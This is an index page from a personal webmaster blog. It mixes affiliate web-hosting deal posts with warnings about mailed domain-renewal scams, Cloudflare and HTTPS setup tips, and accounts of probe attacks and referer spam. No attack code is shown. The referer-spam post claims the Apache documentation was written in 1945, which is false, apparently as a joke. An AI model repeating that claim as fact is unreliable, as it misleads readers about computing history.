October 16, 2021

Webhosting Deal Alert!


Do you need web hosting now?
If you have been thinking about getting a website online, you need to first arrange for web hosting with a web hosting provider. If you aren't covered in money (I'm not), Hostgator is offering a 19th birthday celebration sale with 70% Off all new† 12 to 36 month shared web hosting accounts from Monday, October 18, at 12:00 AM CST, through Friday, October 22, at 11:59 PM CST 2021. This offer includes free domain registration, as well as a free Let's Encrypt SSL certificate.*

The same deal applies to people who already have a website hosted with a different provider, who's hosting account is about to expire and come up for renewal. If you simply renew your hosting with your existing provider you may be in for a big surprise. This is because it is customary in the web hosting business model to offer new customers a big discount on the first term, but jack up the rate for renewals. This is the opposite treatment that software companies use where you get a price cut to renew or upgrade to the newest version of a program.

Whether you belong to the first category or the second one, you are going to save big bucks if you take advantage of this very limited time offer.

* A Secure Sockets Layer (SSL) certificate is what allows a web page to be served in the secure HTTPS protocol because it encrypts data going both ways, from a web browser to and from the web server. This insures that any data you type or paste into a contact or card payment form cannot be viewed in readable form by a man in the middle hacker or criminal who might try to intercept traffic on that website.

† This deal only applies to new customers with Hostgator, If you currently have an active Hostgator account you cannot use these links to save on a renewal or upgrade fee.

70% Off Shared Web Hosting now!

If you happen to miss this flash 70% of sale, or simply aren't ready to make a change, here is another link that will save you up to 60% off new† Hostgator hosting packages. Save Up to 60% Off New Hosting + $4.99 on Select Domains with Promo Code 60OFF2017!

Why am I posting this? It is simple. Not only am I a satisfied web hosting customer, I am also an affiliate for Hostgator. If anybody clicks or taps on my image or text links and signs up for a new account, I will earn a very useful commission. If you find this information useful and plan to get or change web hosting soon, why not do it now and take advantage of this money saving offer before it expires?

Hint: if you are a previous customer without an active hosting package with HG you can take advantage of this offer!

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 5, 2021

Domain Registry renewal pitch is back again

June 5, 2021

If you own Internet domain names, like example.com, you should know by now that they have to be renewed after your initial term expires. Some of you got your first year of domain registration for free when you signed up for web hosting. Others may have paid up front to register a domain for multiple years. After that initial term you should have received renewal notices from the domain registrar of hosting company either telling you they were auto-renewing your domain name, or asking you to update your payment information. Those notices would be sent to the email address on file with your domain registrar or web host. Failure to renew a domain will result in any websites tied to it going offline shortly after it expires.

Let's stop at this point so I can define some of the terms I used in the first paragraph. You need to understand what they mean if you own, or want to buy domain names and have online websites.


  • A "Domain" in this context, refers to an digital asset that can be used to point to a website, or other online presence like a file server, database or even a social network.

  • A domain "name" is an alpha-numeric name somebody chooses for use for a website or an online accessible asset. Some companies use domain names on internal networks, but that is not within the context of this article. A domain name has two parts: the prefix and extension. You choose an available prefix then add the available extension. A classic example is "example.com." There are numerous domain extensions, like .com, .net, info, .org, etc.

  • A Domain "Registrar" is a company whose business includes registering domain names and entering them into a world wide database. Unless Registrars are accredited the official licensing body ICANN, they are merely acting as middlemen for someone else who is accredited. Once a domain name is registered and entered into the official registry, it cannot be registered to anybody else unless it expires and is not renewed.

  • A "Website" (a.k.a.: web site), in this context, is an online presence for a domain that has publicly or privately viewable content that is reached over the Internet. For the sake of clarity, I am referring to websites like mine: wizcrafts.net.

  • A "web host, or hosting company" is a business that owns huge numbers of bare metal computers known as "servers" that are housed in climate controlled warehouses. They provide the digital space for their customers to create websites and have them viewable over the Internet.

  • If you are reading this you know what the "Internet" is.

Moving along, last year I wrote a blog article about the Domain Registry (of America) registration renewal scam I got in the mail. Well, I just got another letter from this company, located in Bergen, New Jersey, notifying me that one of my domain names was about to expire and that I needed to renew it quickly to maintain its online presence. The fee they are asking for is $50 for one year or $90 for two years. Those rates are through the roof too high in today's domain registration market! I can renew a .com or .net domain for between $10 and $16 US dollars per year at Domain.com, or Cloudflare.

I went to the new website shown in the letter I got from them and they have dropped the words "of America," but the logo still contains Domain Registry next to a round portion of an American flag. They have a confusing double business name: "Global Internet Ventures: and "Internet Domain Name Services Inc." Nowhere on any of their few web pages is there any mention of them being accredited by ICANN. Any legitimate Registrar will proudly display the ICANN Accredited logo. It appears that Domain Registry, et all, is just a middle man for somebody else. Their exorbitant markup of $50 for registrations and renewals belies the fact they they aren't trying to compete for your business. They are getting sales from the letters they mail out to registered domain owners trying to fool them into transferring to Domain Registry from their existing registrar (which is likely much lower priced in the first place). They are hoping you are too busy to read the fine print or look up who your registrar is and you will pay them through the nose for the privilege of being bent over by DROA.

There is a funny twist to this story. It so happens that the domain name they wanted me to pay $50 to renew before it expires is already expired! It isn't assigned to me or anybody else. It went to the bit bucket in the sky! So much for doing their homework!

Now that you know the facts, if you own a domain that is coming up for renewal and wonder if you are paying too much, check out my Registrar: Domain.com. As for web hosting, I currently use InMotion Hosting.

I may receive a commission on sales generated through my affiliate links. This isn't a bad thing! It is a way to survive in a big dog little dog world.

Here's a heads up! No matter how many years you register your domains for at a time, it is imperative that you periodically login to the place where they are registered and make sure that your contact info and email address is up to date. A lot of people lose their domain names because they failed to update their email address and didn't receive the notice that the renewal time was approaching. Credit and debit cards usually expire in 3 years. If you took a 5 or 10 year domain registration up front, your card on file may be outdated. If you don't receive the email notices you will lose your domain when the due date passes without payment. If you don't know or remember who the Registrar is you can find out by doing a "Whois" lookup on the domain name (e.g., example.com)

Finally, if you are new to all this and have a website that needs work, consider me as your Webmaster. See my Webmaster Services page for more details.

Thanks for your time.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

September 3, 2020

Return of the Domain Registry renewal notice sales pitch

September 3, 2020

A few days ago I got a letter in the mail, addressed to "Domain Owner," from an outfit calling themselves Domain Registry, with a return address of 924 Bergen Ave, Suite #289, Jersey City, NJ 07306-3018. The address also contained one of my registered domain names.

The envelope boldly proclaimed the following, in bold blue and red type: "Renewal Information Enclosed - OPEN IMMEDIATELY." Inside I found a letter with large bold type warning me that "Domain Name Expiration Notice." The letter told me that the named domain was due to expire in a couple months and that I needed to renew it to maintain my exclusive rights to it and my "online identity." The letter informed me that I could conveniently transfer the expiring domain to Domain Registry to save money with their "best savings" prices. Those prices were $50 for 1 year, $90 for 2 years and $190 for 5 years registration. It went on to offer the two optional domain name extensions: .net and .org, both listed for $90 for 2 years.

Domain owners who have had domains for a long time will remember getting these same scams from Domain Registry Of America. This is the same outfit just using a truncated business name. Further, their website url has changed to giv.com, which is short for Global Internet Ventures.

Continue reading "Return of the Domain Registry renewal notice sales pitch" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

July 19, 2020

Cloudflare's Rocket Loader disabled editing in my MT blog

Cloudflare is an online service that protects websites from various online attacks, blocks unwanted traffic with a user configurable firewall, caches website content to serve it faster than one's own hosting company and provides SSL security certificates, among other things.

I am a long time Cloudflare subscriber and late last year I changed web hosts. I exported and transferred my blog's database to my new host and got my Movable Type blog up and running. However, I was unable to either edit existing posts or create new ones. No matter what I tried, the only way to edit it was by disabling Cloudflare on my website and then enabling it when my editing was done. The cause and solution remained a mystery until July 19, 2020.

I was experimenting with various settings on Cloudflare and one caught my eye. It is a special function called "Rocket Loader." It was enabled and had been since I switched hosting companies. The moment I switched off Rocket Loader my blog posts became editable! Evidently, this function to speed up scripts compresses the white space and messed up some of the scripts used in my version of Movable Type.

If you, or somebody you know is using Cloudflare and is having trouble editing their Movable Type blog, or some other brand of CMS, or creating new posts, the Rocket Loader may be at fault. You can find it by logging into your Cloudflare account, select your website if you have more than one there, then click on the Speed tab, then on Optimization and scroll down to Rocket Loader and click on the switch button to turn it off. The change is instantaneous, or close to it. Turning it back on also happens quickly.

Fortunately for me I have been busy with other pursuits. I guess I developed writers' block for the last half year and didn't have much to say on my computer troubleshooting blog. Now that I have disabled the Rocket Loader I can get back to writing blog articles about online security issues that concern us all.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

September 11, 2019

How I overcame technical difficulties and got my Bluehost websites on Cloudflare

September 11, 2019

Cloudflare is a content delivery network that protects websites from attacks and unwanted traffic, as well as keeping them online when hosting servers go down. I had my websites on Cloudflare, but left it. Recently, I decided to get back on the service, but it turned out to be more difficult than I anticipated.

Background Information

When I wrote this article, all of my websites were hosted on a shared Bluehost server. One of the available free upgrades was to protect or proxy my website content on a service called Cloudflare. I first got on Cloudflare about 3 years ago after my main website, wizcrafts.net, became a target for spammers and exploit attacks. When you join Cloudflare they route your web traffic through their servers, adding a firewall between the Internet and your website. That firewall automatically blocks tons of known exploit probes without any user interaction. You can further configure the firewall to varying extents depending on whether you have a free account, or are a paying customer. When I first joined, I added many of the IP addresses (in CIDR format) that were either probing me for vulnerable scripts, or attempting to post spam comments on my blog and contact forms. There was also a constant stream of what is known as "referer spam" in my server's access logs. By placing my websites behind the Cloudflare firewall, I got rid of most of these annoyances. However, because Cloudflare substituted its own IP addresses in place of the originals, I couldn't identify the source IP addresses like before. This interfered with my ongoing blocklist work that depended on seeing originating IP addresses in the logs.

After years of laboriously compiling and publishing IP addresses belonging to countries I wanted to block, my time at home grew shorter as other business pursuits took its place. First, I stopped publishing iptables blocklists altogether. Then, I slowed down updating my .htaccess blocklists, which were already pretty effective. I still update the .htaccess blocklists using other means of identifying the source IP addresses, just not as often.

After being off Cloudflare for about 1 year, I decided to go back onto it. Previously, all I had to do was log into my hosting provider's control panel and activate Cloudflare for each of my hosted domains. My web host at the time was Bluehost and they were a designated partner company for integrated Cloudflare activations. Back then, within a few hours of activating Cloudflare, my websites were fully protected and online with Cloudflare. Not so this time around.

To be fair, my previous term on Cloudflare was before I obtained a Let's Encrypt SSL Certificate and my web pages were all delivered as HTTP, not HTTPS. Converting from HTTP into HTTPS was a major undertaking which I detailed in this blog post. In my extended comments, I will outline the obstacles I encountered getting back on Cloudflare and the steps I took to overcome them. Suffice it to say that I am now fully on Cloudflare, with green padlocks for HTTPS and all email and ftp systems online and accessible.

Continue reading "How I overcame technical difficulties and got my Bluehost websites on Cloudflare" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

April 2, 2019

iDNS domain name registration scam hits again

April 2, 2019

This is about an ongoing domain registration scam that happened to be in my mailbox this morning. This is also not the first time I have received such a letter, which closely resembles an invoice, from iDNS, which, according to their letterhead, stands for Internet Domain Name Services.

The subject of the letter, composed in large bold type, is: Domain Name Expiration Notice. The text below it claims that "As a courtesy to domain name holders, we are sending you this notification of the domain name registration that is due to expire in the next few months. When you switch today to Internet Domain Name Services, you can take advantage of our best savings." It goes on to list one of my various domain names that comes up for renewal four months from now.

After that paragraph is a panic call to action, warning me that "now is the time to transfer and renew your name from your current Registrar to Internet Domain Name Services." Then, I am warned that "Failure to renew your domain name by the expiration date may result in a loss of your online identity making it difficult for your customers and friends to locate you on the Web.".

A little further down the page is a rate chart that lists my .com domain and offers to renew it for - wait for it - $50 for one year!

Now, let's look at some facts that will take the hot air out of this scam.

Continue reading "iDNS domain name registration scam hits again" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

January 9, 2019

Wizcrafts' Iptables Blocklists Are Gone

January 9, 2019

After years of maintaining iptables blocklists for no profit, I have decided to terminate them as of January 9, 2019. I am not running a charity organization, nor do I have a staff. This is a one man show paid out of my own pocket.

Originally, I only published a few .htaccess format blocklists which I was using to protect my own website. It was something I did in my spare time. I developed the iptables format as a favor to a few webmasters who contacted me about converting .htaccess format into one CIDR per line Linux firewall format. However, the few small donations I have received over the years don't make a dent in the cost of my web hosting, which only goes up. Additionally, due to the time involved in researching offending IP addresses and their CIDRs, as 2018 progressed, my free time for reading raw access logs and spam email headers to identify foreign IPs became shorter. Consequently, I have not been updating my blocklists as often as in the past.

Please turn off your cron jobs targeting wizcrafts.net

For the last few years my server account has been overrun by automated file downloader tools like WGET, CSF, CURL and others, operating as "Cron jobs," that do nothing but scrape the iptables blocklist files, with the thousands of hits every day. In fact, these requests now make up the bulk of all traffic to wizcrafts.net, with the same IP addresses sending requests for the same files - dozens to hundreds of times per day. Scraper tools do not see my ads, nor make donations. They are like Replicators and I have now banished them from my website. If you have been accessing wizcrafts.net via one of these downloader tools, please turn off the cron job and stop sending your bots here. There is nothing for you here anymore. No soup for you!

Going forward, I will only provide iptables blocklists on a one to one paid basis. Use my Webmaster contact form to discuss private access to my iptables blocklists.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

September 23, 2018

Reasons why you should convert your HTTP website into HTTPS

September 23, 2018

In an article I published on August 22, 2018, I explained the changes I made to convert my long time HTTP website into the more secure HTTPS protocol - by activating a free SSL certificate (read the article). It took a lot of time to clean up old links that were preventing my site from showing a green lock in the address bar. This article will concentrate on the benefits of converting vs the potential losses for staying with just HTTP.

HTTP, introduced in 1991, is the original data transfer protocol employed by computer servers for transmitting web pages that have rich text, layout, multimedia content and images and rendering them in a visitor's web browser. HTTP is the foundation of the World Wide Web (a.k.a.; www). Over the ensuing decades since 1991, the web has evolved in huge leaps, while the HTTP protocol itself has barely changed, from HTTP/1.0 in 1991 to the current HTTP/2.0, adapted in 2015.

While HTTP is great for displaying web page content and input forms, it lacks one important feature. It has no built-in encryption to scramble data that is being transfered between those pages and a viewer's computer browser, or vice versa. Rather, all data that is sent both ways is done so in plain text. This wasn't much of a problem in the days of dial-up modems, before wireless broadband became the norm. Short of obtaining a wiretap warrant, in order for a person to intercept a dial-up data exchange they had to plant spyware or a keylogger on the target computer. The keystrokes and contents of web pages, emails, or private chat programs were saved to hidden text files that they had to come and get later on. There was always a chance of getting caught when they retrieved the stolen data.

Nowadays, data thieves sit in adjacent apartments or houses, office cubicles, coffee shops, mall cafes and restaurants where they connect wirelessly to improperly secured broadband routers that provide Wi-Fi connections to their customers. The programs that capture the data are called "packet sniffers" and the electronic technique used to spy on and capture data flowing between a website and computer user is called a "Man In The Middle Attack" (a.k.a., MITM) Basically, the people conducting these attacks use a hacking program to find vulnerable wireless routers to connect to and make a copy of any data they are interested in capturing (just like a tape recording of an old time phone line wiretap).

Continue reading "Reasons why you should convert your HTTP website into HTTPS" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 22, 2018

How I converted my http website into full https

August 22, 2018

For two years now, Google has been warning webmasters and domain owners that non-https websites would be flagged as insecure by the mid-summer of 2018. Well, that time arrived on July 24, 2018 with the release of Google Chrome version 68. Anybody browsing the web with Google Chrome 68 or newer will be warned when they visit a non-https website that the site is "not secure" (Source). These websites are considered insecure because data to and from them is sent in plain text; not encrypted. This means that information a visitor types into forms on HTTP websites, or results displayed in the user's browser could potentially be intercepted or altered by third parties using a "Man In The Middle" program on a networked computer or device. In contrast, pages served via HTTPS are encrypted making them much harder to decypher if intercepted. This has led to a major push for "HTTPS Everywhere."

Some background information about HTTP and HTTPS

For decades, the average personal website was served by an HTTP server. HTTP stands for HyperText Transfer Protocol and is the foundation of what is known as the World Wide Web. Thus, the URL in the address bar usually began with http:// - unless it was an eCommerce website taking online payments. In those cases, security minded domain owners purchased fairly expensive (SSL) certificates and got dedicated IP addresses, allowing their URL to begin with https://. HTTPS adds encryption to all data flowing to and from a web server and web browser, making it HTTPSecure. Note that the SSL protocol has been superceded by the more robust TLS protocol.

Consequences of not upgrading to HTTPS

Since the release of Google Chrome 68 (and also Firefox 58 onward), if a person visiting a non-https website tries to login, or create an account with a username and password, or enter credit/debit card numbers, the browser will discourage or block you from filling in those form fields for your own protection. This will translate into lost inquiries, sales and account sign-ups that would otherwise be sent from those web forms. If that isn't bad enough for the owners of these http websites, Google announced that they will be demoting non-https websites in Google Search results. Preference will be given to fully https websites over the http only sites. If these demoted websites depend upon search traffic and people filling in web forms to conduct their business, this will hurt their web traffic and probably their wallets too. Rather than them, search traffic may be diverted to their competitors who are running https websites (these websites show an unmistakable green lock in the address bar). If a web page isn't secured, it's hard to miss the gray lock icon in the address bar with a red line or yellow triangle to warn visitors about the danger.

If you show affiliate ads on your pages as a referring publisher, you stand to lose if your pages don't show the green lock. Many enterprising publishers have written useful product or services articles and placed ad banners or text links on pages that may have ranked well in the past - on http websites. That was before the push for HTTPS Everywhere. Now, those pages will begin to drop in the search results pages for the same search terms that previously showed them at or near the top.

Now that I've explained the basic reasons for operating a website under the HTTPS protocol, if you have websites running on just HTTP and want to know how to secure them, read the rest of the story. In it I detail what I had to go through to get a green lock on pages containing affiliate advertising links carried over from my HTTP days.

Continue reading "How I converted my http website into full https" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 5, 2014

Super discount on website hosting at Hostgator, today, Cinco De Mayo

May 5, 2014

Today is Cinco De Mayo in Latin America and its people. To celebrate this annual event, Hostgator is offering a huge, one day only, 45% discount on all new website hosting plans.

If you are thinking about starting up a new website, or want to move an existing one from a more expensive hosting company, today is the time to do it and save some big bucks in the process. Just go to the Hostgator home page., any time today, up til 11:59PM, CST, and look over the various types of hosting available. I'm fairly sure you will find one that suits your needs. All of their plans offer a wide range of initial terms, with sliding rates for longer periods of time.

You can save the most money by signing up for 3 years up front. The 45% discount applies to the entire term you sign up for. So, if you go for three years initially, you save on the longer term, plus you get 45% off the usual three year price. Get it? Got it? Good! ;-)

Go to Hostgator now!

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

February 16, 2014

Massive server probe attack on 2/16/2014

February 16, 2014

As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and from where they were referred, but who was attacking my web site and what probes they were using.

On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to an Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.

Upon checking out Towntek.com I was greeted by a "default website page" that is displayed when web space has been leased, but no content has been uploaded to the public web root, and/ or no index page has been published.

So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.

Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.

I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.

Excerpts of the attack are shown in my extended content.

Continue reading "Massive server probe attack on 2/16/2014" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 27, 2013

Hostgator's Black Friday through Cyber Monday sale is about to begin!

November 27, 2013

The annual Black Friday-Cyber Monday web hosting and domain registration sale at Hostgator is set to begin at 12:00 AM, Friday, November 29. It continues through 11:59 PM, Monday, December 2, 2013.

This year, they have outdone themselves, with so-called "Flash Sales" offering discounts of 75% off regular prices, for any and all hosting packages. The first Flash Sale starts on Friday at the stroke of midnight, CST, and runs for one hour until 1 AM, CST, Nov 29. Every hosting package will be priced at 75% off, for your first invoice, which can be any duration from a month, up to 3 years.

There will be additional Flash Sales throughout the weekend, at random times. If you miss out on the Flash Sales, there is still a great 60% off price at all other times.

I have posted details and links to sign up on my Hostgator affiliate page, inside the yellow highlighted section with a red border. Yeah, I'll earn a commission on any sales, but you'll save huge money in the process!

Some things you need to know are:


  1. The discounts only apply to your initial invoice, for as long as your selected package duration lasts. If you sign up for one year, that discount is only good for the first year. I would suggest signing up for 3 years up front, locking in a fantastic rate that most other hosting companies aren't prepared to match.

  2. Existing Hostgator customers can only take advantage of the sale if they purchase a new account, with a new primary domain name. You cannot get out of the normal renewal process via this sale. I know, it sucks ;-(

  3. You can transfer any existing domains to your new account at Hostgator, and/or buy new ones at a significant discount during the sale period.

  4. Hostgator uses cPanel, with all the usual features most of us are used to having. Setting up a new website or transferring your old one should go smoothly. All the usual scripts and .htaccess directives can be used.

See you at Hostgator!

PS: If for some reason you miss this sale, my Hostgator affiliate links will still be good for a 20% discount on your initial invoice, for any hosting package, up to 3 years duration..

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

September 27, 2013

If you run a WordPress Blog on your own web hosting account, read this.

September 27, 2013

In my previous article I wrote about an ongoing botnet hacking campaign targeting WordPress Blog installations on web servers around the World. Read this excerpt.


There is an ongoing attack targeting /wp-login.php, /admin.php and /administrator/ for at least a month, if not longer. Most are brute force password crack attempts, but others are exploiting vulnerable code in WordPress itself.

In addition to attacks against the WordPress software (web applications [apps] and CMS programs are in reality, "software"), which was very recently updated, I see regular attempts to exploit popular WordPress plug-ins. Some of these plug-in attacks are over a year old, yet they are ongoing to this day. Why is that?

Hackers continue to probe with old exploits targeting WordPress and its plug-ins - because these attacks work, due to the software not being patched in a timely manner and due to the people administering the blogs not securing them with strong passwords.

According to recently published research by WP White Security, conducted between September 12 - 15, 2013, as many as 73% of the WordPress installation tested were running out-dated, vulnerable versions of the program itself. This research doesn't say anything about out-dated, exploitable plug-ins or weak or default passwords. The WordPress software itself is out-dated on 73% of the web servers tested just after the release of version 3.6.1. Hopefully, in the 12 days that have passed, more people have upgraded to the current version!

Continue reading "If you run a WordPress Blog on your own web hosting account, read this." »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 19, 2013

Summer specials at Dotster, Domain.com and MyDomain

June 19, 2013

The following is an ad written by me (Wiz). I am an affiliate for this related group of companies (I will earn a small commission if you purchase anything offered here) and am also a long time Dotster customer.

Dotster, Domain.com and MyDomain are all one related company that is in the web hosting and domain name registration business. I originally heard about Dotster in about 1999, on TechTV (now called G4). On that show, Leo Laporte talked about registering domain names and revealed that his choice of "Registrar" was Dotster.

After I learned about Dotster and how domain names that were registered officially could be used for professionally hosted web sites, I went to dotster.com and proceeded to register my first domain name: wizcrafts.net (that's where this blog is located). That was about 13 years ago and I am still using Dotster as my primary Domain Registrar.

Somewhere down the time line I joined an affiliate network that had Dotster as an advertiser. Since I was and am happy with their services and rates, I decided to become an affiliated "publisher" and have promoted Dotster ever since.

Every now and then, Dotster, and its related businesses MyDomain and Domain.com, offer a substantial discount for Registrar and hosting services. I am pleased to let you know that these companies are now offering some really good discounts that are good through July 31, 2013. The details are listed below.

First of all, before you can have a public web site in your own name, hosted professionally, it needs to have its name (e.g. example.com, example.net) registered through an ICANN Acredited Registrar. So, when I want to create a new web site, I pick an available name (or add dashes or letters until I find an available variation) at Dotster.com and pay a small annual fee to register that domain name.

Once you register a domain name, the next step is to get it professionally hosted, so it can be found by search engines and indexed. The "indexing" of web sites by search engine "spiders," like those operated by Google, Yahoo, Bing, etc., occurs when they "crawl" all publicly accessible websites for content. When they find new content, it gets added to their search databases. If you create a new site about the endochronic properties of triple resublimated Thiotimolene, register a domain name and have it professionally hosted, searchers looking for such mundane information will see lists of related search results and eventually, your site will be among those shown in the search results (it takes time for a new web site to appear in most search results, sometimes months).

The Summer 2013 specials at Dotster, Domain.com and MyDomain

Continue reading "Summer specials at Dotster, Domain.com and MyDomain" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 29, 2013

Get web hosting with Hostgator, at 20% off, via my links

May 30, 2013

I am an affiliate for Hostgator, which is a premier web hosting company in the USA. I was just informed that they are putting all of their (new) hosting packages on sale, at 20% off (51% off sale has ended). This discount applies to your first invoice, which can cover up to 3 years.

Hostgator offers a wide variety of hosting packages, ranging from shared accounts, to reseller, to VPS, to dedicated servers. With this current promotion, a 3 year contract for shared hosting would cost as little as $3.96 a month (prepaid), for the Hatchling Plan, or $6.96/month for the Baby Plan, or $10.36/month for the Business Plan - which includes a private SSL certificate and IP address (a must for serious e-commerce stores). VPS (Virtual Private Server) accounts start at only $19.95/month and dedicated servers can be leased for as low as $174/month.

Read the details and compare all hosting plans here.

These minimum prices are all based on a 3 year initial period. The rates are slightly higher for shorter terms. After the initial contract is up, you would have to renew at the going rate for your plan (the same with almost all web hosts.). If your hosting is coming up for renewal and the price is more than you are prepared to pay, this 20% off deal may be exactly what you were looking for.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

April 7, 2013

Websites attacked daily from former Soviet Union IP addresses

April 7, 2013

Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.

When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.

As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that will accepts user input.

One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.

Continue reading "Websites attacked daily from former Soviet Union IP addresses" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

December 5, 2012

How to block Russians spammers from your Apache hosted website

December 5, 2012

I am posting this article for other Webmasters who are having problems with Russian based access log, blog, forum, contact form, or guestbook spammers. Any website that allows the public to post anything to its pages, or to contact the owner or Webmaster, is eventually going to attract the attention of Russian speaking spammers.

I know this from my own experiences running several domains as both the owner and as a Webmaster for other people. If you have any forms that allow others to post to them, the spammers will come. They sometimes just spam the "Referer" field in our website access logs, by posting links to shady websites promoting illicit drugs, counterfeit goods, phony product reviews, etc. They do this just in case your server is configured to publish your raw access logs to the public (a really bad idea!). This is known as "Referer Spam" and it is meant to post links to these often bad websites inside access logs that anybody might be reviewing.

Referrer spam has little chance of success, so website spammers prefer to post spam links and comments on blogs, forums, guestbooks and feedback forms. Since many websites provide some or all of these contact options, it's no surprise that they are often overrun by comment spammers. My access logs reveal that most of the comment spam sources are Russian speaking persons or bots, often emanating from IP addresses in the former Soviet Union.

I have nothing to sell to anybody in the former Soviet Union and have no use for Russian spammers, so I block access to traffic coming from there. Here are some of the ways I do this.

Continue reading "How to block Russians spammers from your Apache hosted website" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

December 7, 2011

Access log "Referer" spam still happening through 2011

Takeaway:

I write about a lot of different types of spam, but one of the oldest, next to email and USENET, is spamming the "REFERER" field on a website's raw access logs. I have been seeing this form of spam for over a decade now.


What is a raw access log?

Websites are usually setup or configured to generate a text or graphical log of all visits to those sites (a.k.a: "hits"). These logs contain information that is useful to Webmasters of the websites. Graphical access logs use pie or column charts to show where the hits are coming from, who sent them to you, what details they were searching for and other useful facts about each request. A "raw access log" presents these details in plain text format, in space-separated groups.


Why would anybody want to spam a website's raw access logs?

Over a decade ago, spammers learned that some website owners, or free hosting companies, or individuals hosting their own web servers at home (usually against T.O.S) were actually publishing their raw access logs so that the owners could read them in a web browser, from anywhere they might be. Most of these published access logs are not password protected, meaning anybody anywhere can view them, if they know the location of those website log files. Since so many people do not understand website security at all, they leave configurations in a default state. This means that if their raw access logs are published, the folder location will be predictable, based upon the operating system of the web server. That web server is usually the Apache Web Server.

Thus, when spammers began seeing website raw access logs that were in default folder locations, on various web servers, they could read them in their browsers, as could anybody else in the World who reads that language. So, some enterprising S.O.B. came up with the brilliant idea of posting a request for some files on some websites, and they decided to include fake "referrer" details.


What is the referrer field in an Access log?

The referrer field is a section of an access log that tells the owner/maintainer of the website where each visitor came from, just before they came to your website. In other words, who referred them to you. This information is extremely valuable for learning who links to your web pages, or is writing about you, or has found your site by means of a search engine result.


What do spammers do to referrer fields to turn them into spam?

Instead of revealing the actual referring page location of the website that the visitor (human or machine) was visiting when they decided to come yours, spammers use special web software programs to create whatever content they wish to present for the referer field. That special content usually takes to form of spammy links containing the names of illicit goods (illicit prescription drugs, counterfeit goods), or services (shady or illegal businesses).


Did I just misspell "referrer" as "referer?"

Nope. When the original Apache Web Server documentation was written, back in 1945, the scientists working on it accidentally misspelled the word Referrer as Referer. This misspelling has stayed with us to this very day!


Now, on to the rest of the details about Referer spam.

Continue reading "Access log "Referer" spam still happening through 2011" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 24, 2011

Web hosting special at HostGator: 50% Off, Extended to Nov 28

UPDATED on Nov 28, 2011, for Cyber Monday!

Are You Looking for Web Hosting With Quality Support? 24/7 Support Via Phone, Live Chat, and Email! Look no farther! HostGator is having its annual Black Friday Cyber Monday half price sale, beginning at 12:01 AM, November 28, and running until 11:59 PM, Nov 28, 2011, CST. All hosting types are included, from shared annual , to monthly, to dedicated servers.

The time zone conversions should revolve around Central Standard Time as the reference. So, if you are in the Eastern time zone, the sale begins at 1 AM Nov 28 and ends at 12:59 AM on Nov 29. You will know if you are within the sale time because the HostGator website has been updated for the 50% off deal.

Here are the details for the Black Friday Cyber Monday sale:

50% OFF on ALL hosting services. This includes shared hosting (as low as $2.48/month prepaid), reseller hosting, VPS hosting, Dedicated servers and Windows hosting! This does not include domain names.

Purchasers do NOT need to insert a coupon code to receive the special. The correct coupon code will automatically be inserted on all orders placed on Black Friday.

The discount applies to the clients first invoice. HostGator's VPS and dedicated server hosting services are only available on a monthly basis, therefore the promotion will apply to only the first month.


Get hosted with HostGator, for half price

Read the details about HostGator's various webhosting accounts

If you are ready to open an account with HostGator, Use this link.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

September 22, 2011

Domain suspended email notice contains malware attachment

Today I saw something new to me in the spam-containing-malware category. It was an email allegedly from one account on my own domain, sent to another existing account on my domain, notifying me that my domain had been suspended! FAIL!

